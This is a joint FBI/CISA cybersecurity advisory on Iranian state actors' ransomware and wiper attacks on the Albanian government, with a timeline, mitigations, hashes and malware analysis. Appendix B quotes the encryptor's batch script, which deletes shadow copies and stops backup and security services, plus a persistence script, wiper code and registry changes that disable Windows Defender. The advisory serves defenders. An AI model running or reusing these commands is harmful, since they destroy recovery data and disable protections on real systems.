AA22-264A: Iranian State Actors Conduct Cyber Operations Against the Government of Albania

Original release date: September 21, 2022

Summary

The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory to provide information on recent cyber operations against the Government of Albania in July and September. This advisory provides a timeline of activity observed, from initial access to execution of encryption and wiper attacks. Additional information concerning files used by the actors during their exploitation of and cyber attack against the victim organization is provided in Appendices A and B.

In July 2022, Iranian state cyber actors—identifying as “HomeLand Justice”—launched a destructive cyber attack against the Government of Albania which rendered websites and services unavailable. A FBI investigation indicates Iranian state cyber actors acquired initial access to the victim’s network approximately 14 months before launching the destructive cyber attack, which included a ransomware-style file encryptor and disk wiping malware. The actors maintained continuous network access for approximately a year, periodically accessing and exfiltrating e-mail content.

Between May and June 2022, Iranian state cyber actors conducted lateral movements, network reconnaissance, and credential harvesting from Albanian government networks. In July 2022, the actors launched ransomware on the networks, leaving an anti-Mujahideen E-Khalq (MEK) message on desktops. When network defenders identified and began to respond to the ransomware activity, the cyber actors deployed a version of ZeroCleare destructive malware.

In June 2022, HomeLand Justice created a website and multiple social media profiles posting anti-MEK messages. On July 18, 2022, HomeLand Justice claimed credit for the cyber attack on Albanian government infrastructure. On July 23, 2022, Homeland Justice posted videos of the cyber attack on their website. From late July to mid-August 2022, social media accounts associated with HomeLand Justice demonstrated a repeated pattern of advertising Albanian Government information for release, posting a poll asking respondents to select the government information to be released by HomeLand Justice, and then releasing that information—either in a .zip file or a video of a screen recording with the documents shown.

In September 2022, Iranian cyber actors launched another wave of cyber attacks against the Government of Albania, using similar TTPs and malware as the cyber attacks in July. These were likely done in retaliation for public attribution of the cyber attacks in July and severed diplomatic ties between Albania and Iran.

Download the PDF version of this report: pdf, 1221 kb

Technical Details

Initial access

Timeframe: Approximately 14 months before encryption and wiper attacks.

Details: Initial access was obtained via exploitation of an Internet-facing Microsoft SharePoint, exploiting CVE-2019-0604.

Persistence and Lateral movement

Timeframe: Approximately several days to two months after initial compromise.

Details: After obtaining access to the victim environment, the actors used several .aspx webshells, pickers.aspx, error4.aspx, and ClientBin.aspx, to maintain persistence. During this timeframe, the actors also used RDP (primarily), SMB, and FTP for lateral movement throughout the victim environment.

Exchange Server compromise

Timeframe: Approximately 1-6 months after initial compromise.

Details: The actors used a compromised Microsoft Exchange account to run searches (via CmdLets New-MailboxSearch and Get-Recipient) on various mailboxes, including for administrator accounts. In this timeframe, the actors used the compromised account to create a new Exchange account and add it to the Organization Management role group.

Likely Email exfiltration

Timeframe: Approximately 8 months after initial compromise.

Details: The actors made thousands of HTTP POST requests to Exchange servers of the victim organization. The FBI observed the client transferring roughly 70-160 MB of data, and the server transferring roughly 3-20 GB of data.

VPN activity

Timeframe: Approximately 12-14 months after initial compromise.

Details: Approximately twelve months after initial access and two months before launching the destructive cyber attack, the actors made connections to IP addresses belonging to the victim organization’s Virtual Private Network (VPN) appliance. The actors’ activity primarily involved two compromised accounts. The actors executed the “Advanced Port Scanner” (advanced_port_scanner.exe). The FBI also found evidence of Mimikatz usage and LSASS dumping.

File Cryptor (ransomware-style file encryptor)

Timeframe: Approximately 14 months after initial compromise.

Details: For the encryption component of the cyber attack, the actor logged in to a victim organization print server via RDP and kicked off a process (Mellona.exe) which would propagate the GoXml.exe encryptor to a list of internal machines, along with a persistence script called win.bat. As deployed, GoXML.exe encrypted all files (except those having extensions .exe, .dll, .sys, .lnk, or .lck) on the target system, leaving behind a ransom note titled How_To_Unlock_MyFiles.txt in each folder impacted.

Wiper attack

Timeframe: Approximately 14 months after initial compromise.

Details: In the same timeframe as the encryption attack, the actors began actions that resulted in raw disk drives being wiped with the Disk Wiper tool (cl.exe) described in Appendix A. Approximately over the next eight hours, numerous RDP connections were logged from an identified victim server to other hosts on the victim’s network. Command line execution of cl.exe was observed in cached bitmap files from these RDP sessions on the victim server.

Mitigations

  • Ensure anti-virus and anti-malware software is enabled and signature definitions are updated regularly and in a timely manner. Well-maintained anti-virus software may prevent use of commonly deployed cyber attacker tools that are delivered via spear-phishing.
  • Adopt threat reputation services at the network device, operating system, application, and email service levels. Reputation services can be used to detect or prevent low-reputation email addresses, files, URLs, and IP addresses used in spear-phishing attacks.
  • If your organization is employing certain types of software and appliances vulnerable to known Common Vulnerabilities and Exposures (CVEs), ensure those vulnerabilities are patched. Prioritize patching known exploited vulnerabilities.
  • Monitor for unusually large amounts of data (i.e. several GB) being transferred from a Microsoft Exchange server.
  • Check the host-based indications, including webshells, for positive hits within your environment.

Additionally, FBI and CISA recommend organizations apply the following best practices to reduce risk of compromise:

  • Maintain and test an incident response plan.
  • Ensure your organization has a vulnerability management program in place and that it prioritizes patch management and vulnerability scanning of known exploited vulnerabilities. Note: CISA’s Cyber Hygiene Services (CyHy) are free to all state, local, tribal, and territorial (SLTT) organizations, as well as public and private sector critical infrastructure organizations.
  • Properly configure and secure internet-facing network devices.
    • Do not expose management interfaces to the internet.
    • Disable unused or unnecessary network ports and protocols.
    • Disable/remove unused network services and devices.
  • Adopt zero-trust principles and architecture, including:
    • Micro-segmenting networks and functions to limit or block lateral movements.
    • Enforcing phishing-resistant multifactor authentication (MFA) for all users and VPN connections.
    • Restricting access to trusted devices and users on the networks.

For more information on Iranian government-sponsored malicious cyber activity, see CISA’s webpage – Iran Cyber Threat Overview and Advisories.

Appendix A

Host-based IOCs

Additional details concerning some of these files are provided in Appendix B.

File

MD5 Hash

Notes

Error4.aspx

81e123351eb80e605ad73268a5653ff3

Webshell

cl.exe

7b71764236f244ae971742ee1bc6b098

Wiper

GoXML.exe

bbe983dba3bf319621b447618548b740

Encryptor

Goxml.jpg

0738242a521bdfe1f3ecc173f1726aa1

 

ClientBin.aspx

a9fa6cfdba41c57d8094545e9b56db36

Webshell (reverse-proxy connections)

Pickers.aspx

8f766dea3afd410ebcd5df5994a3c571

Webshell

evaluatesiteupgrade.cs.aspx

Unknown

Webshell

mellona.exe

78562ba0069d4235f28efd01e3f32a82

Propagation for Encryptor

win.bat

1635e1acd72809479e21b0ac5497a79b

Launches GoXml.exe on startup

win.bat

18e01dee14167c1cf8a58b6a648ee049

Changes desktop background to encryption image

bb.bat

59a85e8ec23ef5b5c215cd5c8e5bc2ab

Saves SAM and SYSTEM hives to C:Temp, makes cab archive

disable_defender.exe

60afb1e62ac61424a542b8c7b4d2cf01

Disables Windows Defender

rwdsk.sys

8f6e7653807ebb57ecc549cef991d505

Raw disk driver utilized by wiper malware

App_Web_bckwssht.dll

e9b6ecbf0783fa9d6981bba76d949c94

 

 

Network-based IOCs

FBI review of Commercial VPN service IP addresses revealed the following resolutions (per Akamai data):

Country

Company

AL

KEMINET LTD.

DE

NOOP-84-247-59-0-25

DE

GSL NETWORKS

GB

LON-CLIENTS

GB

GB-DATACENTER

NL

NL-LAYERSWITCH-20190220

NL

PANQ-45-86-200-0

US

PRIVATE CUSTOMER

US

BANDITO NETWORKS

US

EXTERNAL

US

RU-SELENA-20080725

US

TRANS OCEAN NETWORK

Appendix B

Ransomware Cryptor

GoXML.exe is a ransomware style file encryptor. It is a Windows executable, digitally signed with a certificate issued to the Kuwait Telecommunications Company KSC, a subsidiary of Saudi Telecommunications Company (STC).

If executed with five or more arguments (the arguments can be anything, as long as there are five or more), the program silently engages its file encryption functionality. Otherwise, a file-open dialog Window is presented, and any opened documents receive an error prompt labeled, Xml Form Builder.

All internal strings are encrypted with a hard coded RC4 key. Before internal data is decrypted, the string decryption routine has a built-in self-test that decrypts a DWORD value and tests to see if the plaintext is the string yes. If so, it will continue to decode its internal strings.

The ransomware will attempt to launch the following batch script; however, this will fail due to a syntax error.

@for /F “skip=1” %C in (‘wmic LogicalDisk get DeviceID’) do (@wmic /namespace:\rootdefault Path SystemRestore Call disable “%C” & @rd /s /q %C$Recycle.bin)

@vssadmin.exe delete shadows /all /quiet

@set SrvLst=vss sql svc$ memtas mepos sophos veeam backup GxVss GxBlr GxFWD GxCVD GxCIMgr DefWatch ccEvtMgr ccSetMgr SavRoam RTVscan QBFCService QBIDPService ntuit.QuickBooks.FCS QBCFMonitorService YooBackup YooIT zhudongfangyu sophos stc_raw_agent VSNAPVSS VeeamTransportSvc VeeamDeploymentService VeeamNFSSvc veeam PDVFSService BackupExecVSSProvider BackupExecAgentAccelerator BackupExecAgentBrowser BackupExecDiveciMediaService BackupExecJobEngine BackupExecManagementService BackupExecRPCService AcrSch2Svc AcronisAgent CASAD2DWebSvc CAARCUpdateSvc

@for %C in (%SrvLst%) do @net stop %C

@set SrvLst=

@set PrcLst=mysql sql oracle ocssd dbsnmp synctime agntsvc isqlplussvc xfssvccon mydesktopservice ocautoupds encsvc tbirdconfig mydesktopqos ocomm dbeng50 sqbcoreservice excel infopath msaccess mspub onenote outlook powerpnt steam thebat thunderbird visio winword wordpad notepad

@for %C in (%PrcLst%) do @taskkill /f /im “%C.exe”

@set PrcLst=

@exit

 

The syntax error consists of a missing backslash that separates system32 and cmd.exe, so the process is launched as system32cmd.exe which is an invalid command.

 

The ransomware’s file encryption routine will generate a random string, take the MD5 hash and use that to generate an RC4 128 key which is used to encrypt files. This key is encrypted with a hard coded Public RSA key and converted to Base64 utilizing a custom alphabet. This is appended to the end of the ransom note.

The cryptor places a file called How_To_Unlock_MyFiles.txt in directories with encrypted files.

Each encrypted file is given the .lck extension and the contents of each file are only encrypted up to 0x100000 or 1,048,576 bytes which is a hard coded limit.

Separately, the actor ran a batch script (win.bat below) to set a specific desktop background.

File Details

GoXml.exe

File Size:

43.48 KB (44520 bytes)

SHA256:

f116acc6508843f59e59fb5a8d643370dce82f492a217764521f46a856cc4cb5

SHA1:

5d117d8ef075f3f8ed1d4edcc0771a2a0886a376

MD5:

bbe983dba3bf319621b447618548b740

SSDeep:

768:+OFu8Q3w6QzfR5Jni6SQD7qSFDs6P93/q0XIc/UB5EPABWX

:RFu8QAFzffJui79f13/AnB5EPAkX (Ver 1.1)

File Type:

PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows

PE Header Timestamp:

2016-04-30 17:08:19

ImpHash:

5b2ce9270beea5915ec9adbcd0dbb070

Cert #0 Subject C=KW, L=Salmiya, O=Kuwait Telecommunications Company KSC, OU=Kuwait Telecommunications Company, CN=Kuwait Telecommunications Company KSC

Cert #0 Issuer  C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Assured ID Code Signing CA

Cert #0 SHA1    55d90ec44b97b64b6dd4e3aee4d1585d6b14b26f

 

win.bat (#1, run malware)

File Size:

67 bytes

SHA256:

bad65769c0b416bb16a82b5be11f1d4788239f8b2ba77ae57948b53a69e230a6

SHA1:

14b8c155e01f25e749a9726958606b242c8624b9

MD5:

1635e1acd72809479e21b0ac5497a79b

SSDeep:

3:LjTFKCkRErG+fyM1KDCFUF82G:r0aH1+DF82G (Ver 1.1)

File Type:

ASCII text, with no line terminators

Contents:

start /min C:ProgramDataMicrosoftWindowsGoXml.exe 1 2 3 4 5 6 7

 

win.bat (#2, install desktop image)

Filename:

ec4cd040fd14bff86f6f6e7ba357e5bcf150c455532800edf97782836e97f6d2

File Size:

765 bytes

SHA256:

ec4cd040fd14bff86f6f6e7ba357e5bcf150c455532800edf97782836e97f6d2

SHA1:

fce0db6e66d227d3b82d4564446ede0c0fd7598c

MD5:

18e01dee14167c1cf8a58b6a648ee049

SSDeep:

12:wbYVJ69/TsdLd6sdLd3mTDwfV+EVTCuwfV+EVTCuwfV+EVTCuwfV+EVTCuwfV

+Et:wq69/kZxZ3mTDY9HY9HY9HY9HY9j (Ver 1.1)

File Type:

DOS batch file text, ASCII text, with CRLF line terminators

Contents:

@echo off

setlocal enabledelayedexpansion

set “Wtime=!time:~0,2!”

if “!Wtime!” leq “20” reg add “HKEY_CURRENT_USERControl PanelDesktop” /v Wallpaper /t REG_SZ /d “c:programdataGoXml.jpg” /f & goto done

if “!Wtime!” geq “20” reg add “HKEY_CURRENT_USERControl PanelDesktop” /v Wallpaper /t REG_SZ /d “c:programdataGoXml.jpg” /f & goto done

:done

timeout /t 5 >nul

start “” /b RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters ,1 ,True

start “” /b RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters ,1 ,True

start “” /b RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters ,1 ,True

start “” /b RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters ,1 ,True

start “” /b RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters ,1 ,True

endlocal

 

goxml.jpg

File Size:

1.2 MB (1259040 bytes)

SHA256:

63dd02c371e84323c4fd9a161a75e0f525423219e8a6ec1b95dd9eda182af2c9

SHA1:

683eaec2b3bb5436f00b2172e287dc95e2ff2266

MD5:

0738242a521bdfe1f3ecc173f1726aa1

SSDeep:

12288:ME0p1RE70zxntT/ylTyaaSMn2fS+0M6puxKfJbDKrCxMe5fPSC2tmx

VjpJT/n37p:MHyUt7yQaaPXS6pjar+MwrjpJ7VIbZg (Ver 1.1)

File Type:

JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=13, height=1752, bps=0, PhotometricIntepretation=CMYK, orientation=upper-left, width=2484TIFF image data, big-endian, direntries=13, height=1752, bps=0, PhotometricIntepretation=CMYK, orientation=upper-left, width=2484], progressive, precision 8, 2484×1752, components 4

Software:

Adobe Photoshop 22.4 (Windows)

Modify Date:

2022-07-13 20:45:20

Create Date:

2020-06-11 02:13:33

Metadata Date:

2022-07-13 20:45:20

Profile Date Time:

2000-07-26 05:41:53

Image Size:

2484×1752

File Size:

1.2 MB (1259040 bytes)

SHA256:

63dd02c371e84323c4fd9a161a75e0f525423219e8a6ec1b95dd9eda182af2c9

Disk Wiper

The files cl.exe and rwdsk.sys are part of a disk wiper utility that provides raw access to the hard drive for the purposes of wiping data. From the command line the cl.exe file accepts the arguments:

  • in
  • un
  • wp <optional argument>

If executed with the in command, the utility will output in start! and installs a hard coded file named rwdsk.sys as a service named RawDisk3. The .SYS file is not extracted from the installer however, but rather the installer looks for the file in the same directory that the cl.exe is executed in. 

It will also load the driver after installation.

The un command uninstalls the service, outputting the message “un start!” to the terminal.
The wp command will access the loaded driver for raw disk access.

The long hexadecimal string is hard coded in the cl.exe binary.

      RawDisk3File = (void *)toOpenRawDisk3File(

                               arg2_WideCharStr,

                               0xC0000000,

                               L”B4B615C28CCD059CF8ED1ABF1C71FE03C0354522990AF63ADF3C911E2287A4B906D47D”);

      ptrRawDiskFile = RawDisk3File;

      if ( RawDisk3File )

      {

        sizeDisk = toGetDiskSize(RawDisk3File);

        terminal_out(“Total Bytez : %lldn”, sizeDisk << 9);

The wp command also takes an additional argument as a device path to place after RawDisk3 in the output string. It is uncertain what creates this path to a device as the driver tested did not.

The output is “wp starts!” followed by the total bytes of the drive and the time the wipe operation takes.

If the registry key value HKLMSOFTWAREEldoSEventLog is set to “Enabled”, the install will generate an event log if at any time the install produces an error. This log contains an error code DWORD followed by the string ….DriverLibrariesDrvSupLibinstall.c. If the system does not have the SOFTWAREEldoS key, no event logs would be produced. This feature must be a related to the legitimate EldoS utility. 

rwdsk.sys is a “legitimate commercial driver from the EldoS Corporation that is used for interacting with files, disks, and partitions. The driver allows for direct modification of data on a local computer’s hard drive. In some cases, the tool can enact these raw disk modifications from user-mode processes, circumventing Windows operating system security features.”https://attack.mitre.org/software/S0364/

File Details

cl.exe

 

File Size

142.5 KB (145920 bytes)

SHA256

e1204ebbd8f15dbf5f2e41dddc5337e3182fc4daf75b05acc948b8b965480ca0

SHA1

f22a7ec80fbfdc4d8ed796119c76bfac01e0a908

MD5

7b71764236f244ae971742ee1bc6b098

SSDeep

3072:vv2ADi7yOcE/YMBSZ0fZX4kpK1OhJrDwM:vv2jeQ/flfZbKM (Ver 1.1)

Filetype

PE32+ executable (console) x86-64, for MS Windows

PE Header Timestamp

2022-07-15 13:26:28

ImpHash

58d51c1152817ca3dec77f2eee52cbef

 

rwdsk.sys

 

File Size

38.84 KB (39776 bytes)

SHA256

3c9dc8ada56adf9cebfc501a2d3946680dcb0534a137e2e27a7fcb5994cd9de6

SHA1

5e061701b14faf9adec9dd0b2423ff3cfc18764b

MD5

8f6e7653807ebb57ecc549cef991d505

SSDeep

768:E31ySCpoCbXnfDbEaJSooKIDyE9aBazWlEAusxsia:0gyCb3MFKIHO4Ausxta (Ver 1.1)

Filetype

PE32+ executable (native) x86-64, for MS Windows

PEtype

Driver

PE Header Timestamp

2016-03-18 14:44:54

ImpHash

e233f2cdc91faafe1467d9e52f166213

Cert #0 Subject

CN=VeriSign Time Stamping Services CA, O=VeriSign, Inc., C=US

Cert #0 Issuer

CN=VeriSign Time Stamping Services CA, O=VeriSign, Inc., C=US

Cert #0 SHA1

382c18388fb326221dfd7a77ee874f9ba60e04bf

Cert #1 Subject

C=US, ST=California, L=SANTA CLARA, O=NVIDIA Corporation, CN=NVIDIA Corporation

Cert #1 Issuer

C=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=Terms of use at https://www.verisign.com/rpa (c)10, CN=VeriSign Class 3 Code Signing 2010 CA

Cert #1 SHA1

30632ea310114105969d0bda28fdce267104754f

Cert #2 Subject

C=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=(c) 2006 VeriSign, Inc. – For authorized use only, CN=VeriSign Class 3 Public Primary Certification Authority – G5

Cert #2 Issuer

C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Code Verification Root

Cert #2 SHA1

57534ccc33914c41f70e2cbb2103a1db18817d8b

Cert #3 Subject

C=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=Terms of use at https://www.verisign.com/rpa (c)10, CN=VeriSign Class 3 Code Signing 2010 CA

Cert #3 Issuer

C=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=(c) 2006 VeriSign, Inc. – For authorized use only, CN=VeriSign Class 3 Public Primary Certification Authority – G5

Cert #3 SHA1

495847a93187cfb8c71f840cb7b41497ad95c64f

 

Additional Files

Web Deployed Reverse Proxy

Description

ClientBin.aspx is an ASP file that contains a Base64 encoded .Net executable (App_Web_bckwssht.dll) that it decodes and loads via Reflection. The .Net executable contains Class and Method obfuscation and internal strings are encoded with a single byte XOR obfuscation.

public static string hair_school_bracket()
        {
            return Umbrella_admit_arctic.rebel_sadreporthospital(“460F2830272A2F2266052928202F21661627252D27212368”);  //Invalid Config Package.
        }

public static string Visual_math_already()
        {
       return Umbrella_admit_arctic.rebel_sadreporthospital(“5304057E0116001607”);   //WV-RESET

The method rebel_sadreporthospital takes the first byte of the encoded string and XOR’s each subsequent byte to produce the de-obfuscated string.

When run in context of an IIS web server connecting to the ASPX file will generate a 200 <Encryption DLL Info> 1.5 output.
 

The hex string represents the following ASCII text:

Base64, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null

Sending a POST request with a Base64 encoded IP and port will open a second socket to the supplied IP and port making this a Web proxy. 

Sending a request to WV-RESET with a value will produce an OK response and call a function to shut down the proxy socket.

The DLL extracts a secondary “EncryptionDLL” named Base64.dll which is loaded via Assembly.Load. This exposes two functions, encrypt and decrypt. This DLL is used to decrypt the Proxy IP and port along with data. In this instance the class name is misspelled Bsae64, which is also reflected in the calling DLLs decoded strings. It is uncertain as to why an additional Base64.dll binary is extracted when the same encoding could be hard coded in the original DLL. It is possible other versions of this tool utilize differing “EncryptionDLL” binaries.
 

File Details

ClientBin.aspx

 

File Size

55.24 KB (56561 bytes)

SHA256

7ad64b64e0a4e510be42ba631868bbda8779139dc0daad9395ab048306cc83c5

SHA1

e03edd9114e7a0138d1309034cad6b461ab0035b

MD5

a9fa6cfdba41c57d8094545e9b56db36

SSDeep

768:x9TfK6nOgo5zE/cezUijAwZIFxK1mGjncrF8EAZ0iBDZBZdywb0DwHN4N4wjMxr8:x9TfdOgAi2 (Ver 1.1)

Filetype

HTML document text, ASCII text, with very long lines (56458)

 

App_Web_bckwssht.dll

 

File Size

41.0 KB (41984 bytes)

SHA256

cad2bc224108142b5aa19d787c19df236b0d12c779273d05f9b0298a63dc1fe5

SHA1

49fd8de33aa0ea0c7432d62f1ddca832fab25325

MD5

e9b6ecbf0783fa9d6981bba76d949c94

SSDeep

384:coY4jnD7l9VAk1dtrGBlLGYEX1tah8dgNyamGOvMTfdYN5qZAsP:hlXAkHRGBlUUh8cFmpv6feYLP (Ver 1.1)

Filetype

PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows

PEtype

DLL

PE Header Timestamp

2021-06-07 10:37:55

ImpHash

dae02f32a21e03ce65412f6e56942daa

Disable Defender

Description

disable_defender.exe is a Microsoft Windows PE file that attempts to disable Windows Defender. The application will elevate privileges to that of SYSTEM and then attempt to disable Defender’s core functions. A command prompt with status and error messages is displayed as the application executes. No network activity was detected during the evaluation.

Upon execution, a command prompt is launched and a message is displayed if the process is not running as SYSTEM. The process is then restarted with the required permissions.

The application will attempt to terminate the Windows Defender process by calling TerminateProcess for smartscreen.exe:

The following Registry Keys were modified to disable Windows Defender:

Set Registry Values (observed Win10 1709)

 

HKLMSOFTWAREMicrosoftWindows DefenderFeaturesTamperProtection 

 

 

HKLMSOFTWAREPoliciesMicrosoftWindows DefenderDisableAntiSpyware 

HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorer
StartupApprovedRunSecurityHealth 

03 00 00 00 5D 02 00 00 41 3B 47 9D 

HKLMSOFTWAREMicrosoftWindows DefenderDisableAntiSpyware 

HKLMSystemCurrentControlSetServicesWinDefendStart 

HKLMSOFTWAREMicrosoftWindows DefenderReal-Time Protection
DisableRealtimeMonitoring 

Upon completion and if successful the application will display the following messages and wait for user input.

disable-defender.exe

 

File Size

292.0 KB (299008 bytes)

SHA256

45bf0057b3121c6e444b316afafdd802d16083282d1cbfde3cdbf2a9d0915ace

SHA1

e866cc6b1507f21f688ecc2ef15a64e413743da7

MD5

60afb1e62ac61424a542b8c7b4d2cf01

SSDeep

6144:t2WhikbJZc+Wrbe/t1zT/p03BuGJ1oh7ISCLun:t2WpZnW+/tVoJ1ouQ (Ver 1.1)

Filetype

PE32+ executable (console) x86-64, for MS Windows

PEtype

EXE

PE Header Timestamp

2021-10-24 15:07:32

ImpHash

74a6ef9e7b49c71341e439022f643c8e

Revisions

  • September 21, 2022: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.